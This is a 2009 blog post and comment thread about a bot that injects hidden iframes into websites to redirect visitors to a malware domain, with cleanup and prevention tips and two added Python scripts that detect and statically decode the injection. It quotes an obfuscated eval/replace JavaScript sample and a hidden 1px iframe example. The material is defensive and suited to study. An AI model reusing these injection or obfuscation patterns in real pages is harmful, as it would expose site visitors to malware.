So I emerged from a fantastic vacation weekend to find all of my PHP sites not working, each displaying the same simple error message:
“Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ‘,’ or ‘;’”
After my initial 30 second panic attack subsided I did a little googling and came up with this site: http://www.geeked.info/web-site-hack-loading-microsotfcn/
I’m assuming this is a bot that crawls from site to site. I had websites hacked across three different servers.
Once hacked, the site should produce a tiny iFrame that redirects to microsotf.cn. Don’t visit the page. It will most certainly ruin your day – spyware, malware, whatever. The beauty is – WordPress sites don’t display the iFrame. They just wind up broken. Other sites, however, won’t appear very different at all, and it will be nearly impossible to tell whether the site was hacked or not.
If you’re having this problem, simply open the source of the page in question and look for a block of code similar to this (either immediately following the body tag or at the very bottom of the source code):

Delete the offending code – upload (backup the original first, just in case) and you’re back in business.
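The same check, run over a whole web root instead of one page’s source, as an added example that is not part of the original post: it flags a tiny or hidden iframe, or an eval(...replace(/junk/ig, "")) wrapper, reports file and line, and can be limited to files modified in the last day. The sample page is constructed and attacker.example is a placeholder domain.

```python
"""Find injected blocks like the one described above: a tiny or hidden <iframe>, or an
eval(... .replace(/junk/ig, "")) wrapper. Added example; SAMPLE is constructed."""
import os
import re
import time

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SIZE_RE = re.compile(r"\b(width|height)\s*=\s*[\"']?(\d+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
# eval( ... .replace( /anything/flags , "" ) ): junk tokens stripped right before eval
EVAL_RE = re.compile(r"eval\s*\(.*?\.replace\s*\(\s*/.*?/[a-z]*\s*,\s*([\"'])\1\s*\)",
                     re.IGNORECASE | re.DOTALL)

SAMPLE = r"""<html><body>
<iframe src="http://attacker.example/" width="1" height="1" frameborder="0"></iframe>
<p>Welcome to my site</p>
<script>eval("d$^!%ocument.write('x');".replace(/\$\^\!\%/ig, ""))</script>
</body></html>"""

def find_injections(html):
    """Return [(kind, line_no)] for each suspicious construct, in page order."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        tiny = any(int(v) <= 1 for _, v in SIZE_RE.findall(tag))  # 0px/1px frames
        if tiny or HIDDEN_RE.search(tag):
            hits.append(("hidden-iframe", html.count("\n", 0, m.start()) + 1))
    for m in EVAL_RE.finditer(html):
        hits.append(("eval-replace", html.count("\n", 0, m.start()) + 1))
    return sorted(hits, key=lambda h: h[1])

def scan_tree(root, exts=(".php", ".html", ".htm", ".asp"), changed_within_hours=None):
    """Print path:line: kind for every hit under root; optionally only recently modified files."""
    cutoff = time.time() - changed_within_hours * 3600 if changed_within_hours else None
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(exts):
                continue
            if cutoff is not None and os.path.getmtime(path) < cutoff:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                for kind, line in find_injections(fh.read()):
                    print(f"{path}:{line}: {kind}")

if __name__ == "__main__":
    print(find_injections(SAMPLE))  # [('hidden-iframe', 2), ('eval-replace', 4)]
    scan_tree(".", changed_within_hours=24)  # the "changed in the last 24 hours" sweep
```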
Thanks to Ed over at http://www.geeked.info/ for having the ONLY blog post I could find on the whole internet about the hack.
EDIT: 7/9/09 – It has happened again to one of my sites. Different block of code, different malware site being loaded – same basic poison/remedy. For those interested in learning how to block an ip address (or range of ip addresses) – click here.
Happened to me too. Thanks for posting this.
Happened to us also, 3 times!!!
We don’t know how they keep doing it either!!!
i did that – was ok for a week – now again been attacked by it … changed my FTP passwords and everything – how do u prevent this thing from attacking?
Contact your server administrator (in my case my shared hosting companies) and let them know what’s going on. If they’re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37) or better yet, the entire range: 91.212.*.*
My host is awesome – Glitterhost – servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.
Cool – contacted host and advised them – thanks heaps for the I.P range, was a great help … let’s hope my host is as helpful.
Cheers
http://rockymountainenvironmental.com/
07/04/09 — 8:16am
Altered files: index.htm, index.html, default.asp, main.html
Offending Code: document.write("');document.write("');document.write("");
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.
07/09/09 — 6:11AM
NEW OFFENDING CODE
eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))
This redirect bypassed my script calls and proceeded to download malware.
Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don’t have access or admin rights to .htaccess. Best of luck to all.
(Allen)
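The wrapper Allen quotes above can be decoded without ever running it: the regex inside .replace is simply the list of junk tokens sprinkled through the real code, so applying it with Python’s re instead of eval reveals what eval would have received. This is an added example, not code from the post or the comment; it reads the general eval("…".replace(/…/flags, "")) shape, assuming the junk regex uses only escaped literals and alternation as this one does.

```python
"""Decode an eval("...".replace(/junk/ig, "")) wrapper without executing it.
Added example; SAMPLE_JS is the obfuscated line quoted in the comment above, with the
blog's curly quotes restored to ASCII apostrophes."""
import re

# eval( "STRING" .replace( /REGEX/FLAGS , "" ) )  -- the shape of the quoted wrapper
WRAPPER_RE = re.compile(
    r"""eval\(\s*(["'])(.*?)\1\s*\.replace\(\s*/(.*?)/([a-z]*)\s*,\s*(["'])\5\s*\)\s*\)""",
    re.DOTALL,
)

SAMPLE_JS = r"""eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))"""

def decode_replace_wrapper(js):
    """Return the code eval() would have received, or None if js is not this wrapper.

    Only the JS 'i' flag needs mapping: 'g' (replace all) is re.sub's default, and a
    junk regex made of escaped literals joined by '|' means the same thing to Python's
    re (an assumption for variants that use other regex features)."""
    m = WRAPPER_RE.search(js)
    if not m:
        return None
    _, payload, junk_re, flags, _ = m.groups()
    py_flags = re.IGNORECASE if "i" in flags.lower() else 0
    return re.sub(junk_re, "", payload, flags=py_flags)

if __name__ == "__main__":
    # The argument to document.write is empty in the comment as posted.
    print(decode_replace_wrapper(SAMPLE_JS))  # document.write('');
```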
Happened to me too – 5 sites taken out. For the second time. If you don’t mind, what host are you using? I’m using 1and1.com. I’m wondering if there’s a commonality amongst us.
It’s been suggested from other sites in my research that they may be using your own FTP software by stealing your saved usernames and passwords. Not sure if that’s how they’re getting in to our servers so easily, but it couldn’t hurt to save them in a separate encrypted file. Some also say that it doesn’t matter if you save them with the FTP client or not since they’ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.
I read about the ftp passwords. I don’t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don’t think FTP passwords are the only way in.
I’ve contacted all my Web clients and told them to reset their passwords. And I reset my password as well. I took out all passwords in Filezilla. Is there anything else to do to stop this? I’m running AVG and Malwarebytes and so far that hasn’t stopped microsotf.cn. This is so stressful.
Here’s what I got from the abuse team at one of my hosts:
As for your computer – download Avast. It should catch the trojan that AVG and Malwarebytes are letting slip through. Also make sure EVERY file on your server named “index”, “home” and “login” is cleaned up.
Awesome. I will try your suggestions and will download Avast. Thanks much.
Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.
I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.
This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).
Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!
*Raises hand*
There’s gotta be some pattern.
-Phil
Phil. Before you do any of that you need to scan your system for malware. AVG (corporate edition) couldn’t spot it but Avast did. It’s a free download and even warns me when I DL an infected file off my ftp site. Rid your PC of any potential viruses/trojans/malware – then clean all the possibly infected files on your ftp site. THEN change all your ftp passwords. I *think* I’ve gotten my sites safely out of harm’s way (knock on wood).
I am using Filezilla and just for good measure – it no longer remembers passwords.
Thanks for the tips Matt, keep us posted as to whether your current fix-level proves sufficient. I’ll do the same once I am done sweeping my PC with Avast and reinstalling some things.
-Phil
My site has had this issue several times over the last few weeks. No MySQL on the server so I am sure it’s an FTP attack. My webhost (ixwebhosting) does not offer SSH; I pointed out several others to them that do & said I’m moving unless they do likewise soon. In my case I think the problem came from the person maintaining the Spanish section of my site who is using Filezilla. I found this link http://www.tech-evangelist.com/2009/06/08/filezilla-alert-trojan-virus/ . I use WSFTP Professional which has the ability to search the remote files by date, so when I get hacked I search for those changed in the last 24 hours & it picks them out nicely. It is always the same 5 or 6 pages out of what is a large site. For that reason I suspect they have installed a file somewhere to do the hack that they are executing within my own site. I am currently searching the whole site manually for it if it exists.
Has anyone tried Hack Detect Pro? It’s only $20 and apparently will detect any files changed and replace them with a backup. For that price it’s worth the chance.
Actually as a follow up, when I asked my host for the FTP logs they said they just implemented a new security feature. You upload 2 files to your server root directory, ftp.allow & ftp.deny. This way you can block any IP except your own from access. If you change IPs you would have to do a file transfer in your control panel as you would be blocked yourself. This is a great simple solution. It may be worth considering a host change for some. This is ixwebhosting.
ftp.allow e.g.
ALL: 207.216.239.69
ftp.deny e.g.
All:All
[...] to some good discussions about this iframe hack: Web site hack loading microsotf.cn | Geeked Info Website hack – microsotf.cn – Wordpress | Web Design, Raleigh NC – Matt Swanner Here is an older article/blog post, it does not mention these new .cn domains, but still good [...]
What a really cool blog!